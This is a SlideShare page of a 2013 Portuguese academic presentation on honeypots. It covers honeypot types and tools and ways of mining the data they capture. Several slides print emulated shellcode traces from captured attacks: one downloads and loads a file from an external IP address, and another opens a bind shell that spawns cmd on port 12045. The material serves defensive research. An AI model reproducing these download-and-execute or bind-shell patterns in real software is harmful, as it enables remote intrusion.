SlideShare a Scribd company logo
1 of 23
Download to read offline
UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
Honeypots: o que são, para que servem e
como extrair informações
Pedro H. Matheus
phmatheus@msn.com
UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
• Agenda
• O que são Honeypots
• Para que servem
• Que informações podem ser extraídas ?
3Setembro / 2013phmatheus@msn.com
Honeypot
4Setembro / 2013phmatheus@msn.com
• Honeypots são sistemas computacionais cujo
objetivo é ter falhas de segurança para serem
atacadas e exploradas
O que são Honeypots
5Setembro / 2013phmatheus@msn.com
• Baixa Interatividade
• Média Interatividade
• Alta Interatividade
Honeypot
6Setembro / 2013phmatheus@msn.com
• Honeyd
– É um pequeno programa que cria hosts virtuais na
rede, os hosts podem ser configurados para executar
serviços arbitrarios, a suas caracteristicas podem ser
adaptadas para simularem certos sistemas
operacionais.
• SpamTrap
– É um servidor de e-mail criado não para comunicação
de e-mails mas, para ser explorado por spammers
para enviar e-mails, esse servidor não encaminha o e-
mail enviado para o destinatário, apenas armazena o
e-mail para analise posterior.
Baixa Interatividade
7Setembro / 2013phmatheus@msn.com
• Dionaea
É uma evolução do Nepentes com suporte a IPV6
e um novo meio de se ampliar a base de
conhecimento que anteriormente era escrita em
c++ agora é escrita em python possibilitando que
uma gama maior de programadores criem e
expandam a base de conhecimento conforme
suas necessidades.
Média Interatividade
• Nepenthes
Nepenthes emula as vulnerabilidades para a coleta de
informações sobre potenciais ataques é utilizado uma base de
conhecimento sobre as falhas para interagir com
os atacantes, com o objetivo de obter o artefato malicioso.
8Setembro / 2013phmatheus@msn.com
• Kippo
– Honeypot que simula o serviço de ssh, coletando
informações de ataques de brute-force, e
posteriormente os comandos enviados pelo
atacante.
https://code.google.com/p/kippo/
Média Interatividade
9Setembro / 2013phmatheus@msn.com
• Qebek
– Modificação do QEMU para monitorar todas as
chamadas de sistema do Windows, permitindo
analisar, depurar e monitorar a execução de ataques e
de artefatos maliciosos.
• Sebek
– É um modulo do kernel instalado no Windows com o
proposito de coletar informações sobre os artefatos
maliciosos e os ataques contra os sistemas, ele
permite a coleta de informações desde as teclas
pressionadas até informações criptografadas.
Alta Interatividade
10Setembro / 2013phmatheus@msn.com
O Fluxo de um ataque
Atacante Honeypot
File System
Base de Dados
Binarios
BitStream
Sniffer
11Setembro / 2013phmatheus@msn.com
• Uso dos dados de rede bruto para extração de
informações
• Estatística (Cukier et al. 2006)
• Associação (Ohrui et al. 2010)
• Agrupamento (Ghourabi et al. 2010)
• Correlação com SVM (Song et al. 2011)
• Longest Common Substring (Thakar et al. 2005)
• Redes Neurais MLP e KNN (Grégio et al. 2007)
Extração de informação de Honeypots
12Setembro / 2013phmatheus@msn.com
• O que todos esses trabalhos trazem em
comum é que utilizam os dados de rede para
gerar as estatísticas, para efetuar o
agrupamento, para criar as assinaturas e os
padrões dos detectores de intrusão.
Extração de informação de Honeypots
13Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
Base de Dados
14Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
Binarios
15Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
BitStream
16Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
[
{
"call": "LoadLibraryA",
"args" : [
"urlmon"
],
"return" : "0x7df20000"
},
{
"call": "URLDownloadToFile",
"args" : [
"",
"http://189.29.132.79:6402/dkqc",
"x.",
"0",
"0"
],
"return": "0"
},
{
"call": "LoadLibraryA",
"args" : [
"x."
],
"return" :
"0x00000000"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]
17Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
[
{
"call": "GetProcAddress",
"args" : [
"",
"CreateProcessA"
],
"return" : "0x7c802367"
},
{
"call": "GetProcAddress",
"args" : [
"",
"ExitThread"
],
"return" : "0x7c80c058"
},
{
"call": "GetProcAddress",
"args" : [
"",
"LoadLibraryA"
],
"return" : "0x7c801d77"
},
{
"call": "LoadLibraryA",
"args" : [
"ws2_32"
],
"return" : "0x71a10000"
},
18Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "GetProcAddress",
"args" : [
"",
"WSASocketA"
],
"return" : "0x71a18769"
},
{
"call": "GetProcAddress",
"args" : [
"",
"bind"
],
"return" : "0x71a13e00"
},
{
"call": "GetProcAddress",
"args" : [
"",
"listen"
],
"return" : "0x71a188d3"
},
{
"call": "GetProcAddress",
"args" : [
"",
"accept"
],
"return" : "0x71a21028"
},
19Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "GetProcAddress",
"args" : [
"",
"closesocket"
],
"return" : "0x71a19639"
},
{
"call": "WSASocket",
"args" : [
"2",
"1",
"0",
"0",
"0",
"0"
],
"return": "66"
},
{
"call": "bind",
"args" : [
"66",
{
"sin_family" : "2",
"sin_port" : "12045",
"sin_addr" : {
"s_addr" : "0.0.0.0"
},
"sin_zero" : " "
},
"16"
],
"return": "0"
},
20Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "listen",
"args" : [
"66",
"1"
],
"return": "0"
},
{
"call": "accept",
"args" : [
"66",
{
},
""
],
"return": "68"
},
{
"call": "CreateProcess",
"args" : "", "cmd", "", "","1","0", "", "",
{
"cb" : "0",
"lpReserved" : "0",
"lpDesktop" : "0",
"lpTitle" : "0",
"dwX" : "0",
"dwY" : "0",
"dwXSize" : "0",
"dwYSize" : "0",
"dwXCountChars" : "0",
"dwYCountChars" : "0",
"dwFillAttribute" : "0",
"dwFlags" : "0",
"wShowWindow" : "0",
"cbReserved2" : "0",
"lpReserved2" : "0",
"hStdInput" : "68",
"hStdOutput" : "68",
"hStdError" : "68"
},
21Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"hProcess" : "4711",
"hThread" : "4712",
"dwProcessId" : "4712",
"dwThreadId" : "4714"
}
],
"return": "-1"
},
{
"call": "closesocket",
"args" : [
"68"
],
"return": "0"
},
{
"call": "closesocket",
"args" : [
"66"
],
"return": "0"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]
22Setembro / 2013phmatheus@msn.com
Dúvidas
23Setembro / 2013phmatheus@msn.com
• M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate
attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on,
2006, pp. 383–392.
• M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from
distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th
International Conference on, 2010, pp. 541–545.
• X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and
Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on,
2010, pp. 435–439.
• A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,”
in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010,
pp. 1–6.
• J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids
alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011.
• U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection
patterns & signatures using honeypot,” in Proceedings of the Second International Conference on
Innovations in Information Technology, 2005.
• A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network
activity classification using honeypots data,” in Defense and Security Symposium. International
Society for Optics and Photonics, 2007, pp. 657 006–657 006.
• S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em:
http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf
Referências

More Related Content

Similar to Honeypots: o que são, para que servem e como extrair informações

Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharePalestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharepccdias
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Tiago Tavares
 
Palestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoPalestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoAndre Takegawa
 
BigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaBigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaAlessandro Binhara
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
BIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesBIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesAlessandro Binhara
 
Internet, intranet, extranet
Internet, intranet, extranetInternet, intranet, extranet
Internet, intranet, extranetPricila Yessayan
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAmazon Web Services LATAM
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesCarlos Veiga
 
Big Data e oportunidades de negócios
Big Data e oportunidades de negóciosBig Data e oportunidades de negócios
Big Data e oportunidades de negóciosLaboratorium
 
Palestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfPalestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfGustavo Ferreira Palma
 
artigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesartigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesmauriciomoda
 
Análise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkAnálise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkIgor Bruno
 

Similar to Honeypots: o que são, para que servem e como extrair informações (20)

Bigadata casese opotunidades
Bigadata casese opotunidadesBigadata casese opotunidades
Bigadata casese opotunidades
 
Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharePalestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
 
Inf seg redinf_semana5
Inf seg redinf_semana5Inf seg redinf_semana5
Inf seg redinf_semana5
 
Bridges Virtuais
Bridges VirtuaisBridges Virtuais
Bridges Virtuais
 
Fundamentos de Segurança da Informação
Fundamentos de Segurança da InformaçãoFundamentos de Segurança da Informação
Fundamentos de Segurança da Informação
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016
 
Palestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoPalestra cnasi 2013 s.video
Palestra cnasi 2013 s.video
 
BigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaBigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenharia
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
BIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesBIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  Aplicações
 
Desafios do IoT
Desafios do IoTDesafios do IoT
Desafios do IoT
 
Internet, intranet, extranet
Internet, intranet, extranetInternet, intranet, extranet
Internet, intranet, extranet
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de Ataques
 
Big Data e oportunidades de negócios
Big Data e oportunidades de negóciosBig Data e oportunidades de negócios
Big Data e oportunidades de negócios
 
Mashup
MashupMashup
Mashup
 
Palestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfPalestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdf
 
artigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesartigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redes
 
Análise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkAnálise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o Wireshark
 

More from LCoN Mackenzie

Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...LCoN Mackenzie
 
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisReconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisLCoN Mackenzie
 
Processamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisProcessamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisLCoN Mackenzie
 
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosNavegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosLCoN Mackenzie
 
Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"LCoN Mackenzie
 
Metalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesMetalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesLCoN Mackenzie
 
Obtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresObtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresLCoN Mackenzie
 

More from LCoN Mackenzie (7)

Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
 
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisReconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
 
Processamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisProcessamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas Naturais
 
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosNavegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
 
Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"
 
Metalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesMetalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologies
 
Obtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresObtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de Classificadores
 

Recently uploaded

Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptx
Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptxResponde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptx
Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptxAntonioVieira539017
 
P P P 2024 - *CIEJA Santana / Tucuruvi*
P P P 2024  - *CIEJA Santana / Tucuruvi*P P P 2024  - *CIEJA Santana / Tucuruvi*
P P P 2024 - *CIEJA Santana / Tucuruvi*Viviane Moreiras
 
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdf
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdfPROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdf
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdfHELENO FAVACHO
 
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptx
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptxSlides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptx
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptxLuizHenriquedeAlmeid6
 
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdf
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdfProjeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdf
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdfHELENO FAVACHO
 
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAPROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAHELENO FAVACHO
 
Seminário Biologia e desenvolvimento da matrinxa.pptx
Seminário Biologia e desenvolvimento da matrinxa.pptxSeminário Biologia e desenvolvimento da matrinxa.pptx
Seminário Biologia e desenvolvimento da matrinxa.pptxReinaldoMuller1
 
Os editoriais, reportagens e entrevistas.pptx
Os editoriais, reportagens e entrevistas.pptxOs editoriais, reportagens e entrevistas.pptx
Os editoriais, reportagens e entrevistas.pptxTailsonSantos1
 
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdf
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdfPROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdf
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdfHELENO FAVACHO
 
Plano de aula Nova Escola períodos simples e composto parte 1.pptx
Plano de aula Nova Escola períodos simples e composto parte 1.pptxPlano de aula Nova Escola períodos simples e composto parte 1.pptx
Plano de aula Nova Escola períodos simples e composto parte 1.pptxPaulaYaraDaasPedro
 
Conflitos entre: ISRAEL E PALESTINA.pdf
Conflitos entre:  ISRAEL E PALESTINA.pdfConflitos entre:  ISRAEL E PALESTINA.pdf
Conflitos entre: ISRAEL E PALESTINA.pdfjacquescardosodias
 
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...PatriciaCaetano18
 
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptx
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptxTeoria heterotrófica e autotrófica dos primeiros seres vivos..pptx
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptxTailsonSantos1
 
M0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptxM0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptxJustinoTeixeira1
 
Sistema de Bibliotecas UCS - Cantos do fim do século
Sistema de Bibliotecas UCS  - Cantos do fim do séculoSistema de Bibliotecas UCS  - Cantos do fim do século
Sistema de Bibliotecas UCS - Cantos do fim do séculoBiblioteca UCS
 
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfApresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfcomercial400681
 
About Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de HotéisAbout Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de Hotéisines09cachapa
 
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...MariaCristinaSouzaLe1
 
Produção de Texto - 5º ano - CRÔNICA.pptx
Produção de Texto - 5º ano - CRÔNICA.pptxProdução de Texto - 5º ano - CRÔNICA.pptx
Produção de Texto - 5º ano - CRÔNICA.pptxLeonardoGabriel65
 
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptx
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptxSlides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptx
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptxLuizHenriquedeAlmeid6
 

Recently uploaded (20)

Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptx
Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptxResponde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptx
Responde ou passa na HISTÓRIA - REVOLUÇÃO INDUSTRIAL - 8º ANO.pptx
 
P P P 2024 - *CIEJA Santana / Tucuruvi*
P P P 2024  - *CIEJA Santana / Tucuruvi*P P P 2024  - *CIEJA Santana / Tucuruvi*
P P P 2024 - *CIEJA Santana / Tucuruvi*
 
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdf
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdfPROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdf
PROJETO DE EXTENSÃO I - TERAPIAS INTEGRATIVAS E COMPLEMENTARES.pdf
 
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptx
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptxSlides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptx
Slides Lição 6, CPAD, As Nossas Armas Espirituais, 2Tr24.pptx
 
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdf
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdfProjeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdf
Projeto de Extensão - ENGENHARIA DE SOFTWARE - BACHARELADO.pdf
 
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAPROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
 
Seminário Biologia e desenvolvimento da matrinxa.pptx
Seminário Biologia e desenvolvimento da matrinxa.pptxSeminário Biologia e desenvolvimento da matrinxa.pptx
Seminário Biologia e desenvolvimento da matrinxa.pptx
 
Os editoriais, reportagens e entrevistas.pptx
Os editoriais, reportagens e entrevistas.pptxOs editoriais, reportagens e entrevistas.pptx
Os editoriais, reportagens e entrevistas.pptx
 
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdf
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdfPROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdf
PROJETO DE EXTENÇÃO - GESTÃO DE RECURSOS HUMANOS.pdf
 
Plano de aula Nova Escola períodos simples e composto parte 1.pptx
Plano de aula Nova Escola períodos simples e composto parte 1.pptxPlano de aula Nova Escola períodos simples e composto parte 1.pptx
Plano de aula Nova Escola períodos simples e composto parte 1.pptx
 
Conflitos entre: ISRAEL E PALESTINA.pdf
Conflitos entre:  ISRAEL E PALESTINA.pdfConflitos entre:  ISRAEL E PALESTINA.pdf
Conflitos entre: ISRAEL E PALESTINA.pdf
 
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
 
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptx
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptxTeoria heterotrófica e autotrófica dos primeiros seres vivos..pptx
Teoria heterotrófica e autotrófica dos primeiros seres vivos..pptx
 
M0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptxM0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptx
 
Sistema de Bibliotecas UCS - Cantos do fim do século
Sistema de Bibliotecas UCS  - Cantos do fim do séculoSistema de Bibliotecas UCS  - Cantos do fim do século
Sistema de Bibliotecas UCS - Cantos do fim do século
 
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfApresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
 
About Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de HotéisAbout Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de Hotéis
 
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...
Aula 25 - A america espanhola - colonização, exploraçãp e trabalho (mita e en...
 
Produção de Texto - 5º ano - CRÔNICA.pptx
Produção de Texto - 5º ano - CRÔNICA.pptxProdução de Texto - 5º ano - CRÔNICA.pptx
Produção de Texto - 5º ano - CRÔNICA.pptx
 
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptx
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptxSlides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptx
Slides Lição 6, Betel, Ordenança para uma vida de obediência e submissão.pptx
 

Honeypots: o que são, para que servem e como extrair informações

  • 1. UNIVERSIDADE PRESBITERIANA MACKENZIE Programa de Pós Graduação em Engenharia Elétrica Laboratório de Computação Natural - LCoN Honeypots: o que são, para que servem e como extrair informações Pedro H. Matheus phmatheus@msn.com
  • 2. UNIVERSIDADE PRESBITERIANA MACKENZIE Programa de Pós Graduação em Engenharia Elétrica Laboratório de Computação Natural - LCoN • Agenda • O que são Honeypots • Para que servem • Que informações podem ser extraídas ?
  • 4. 4Setembro / 2013phmatheus@msn.com • Honeypots são sistemas computacionais cujo objetivo é ter falhas de segurança para serem atacadas e exploradas O que são Honeypots
  • 5. 5Setembro / 2013phmatheus@msn.com • Baixa Interatividade • Média Interatividade • Alta Interatividade Honeypot
  • 6. 6Setembro / 2013phmatheus@msn.com • Honeyd – É um pequeno programa que cria hosts virtuais na rede, os hosts podem ser configurados para executar serviços arbitrarios, a suas caracteristicas podem ser adaptadas para simularem certos sistemas operacionais. • SpamTrap – É um servidor de e-mail criado não para comunicação de e-mails mas, para ser explorado por spammers para enviar e-mails, esse servidor não encaminha o e- mail enviado para o destinatário, apenas armazena o e-mail para analise posterior. Baixa Interatividade
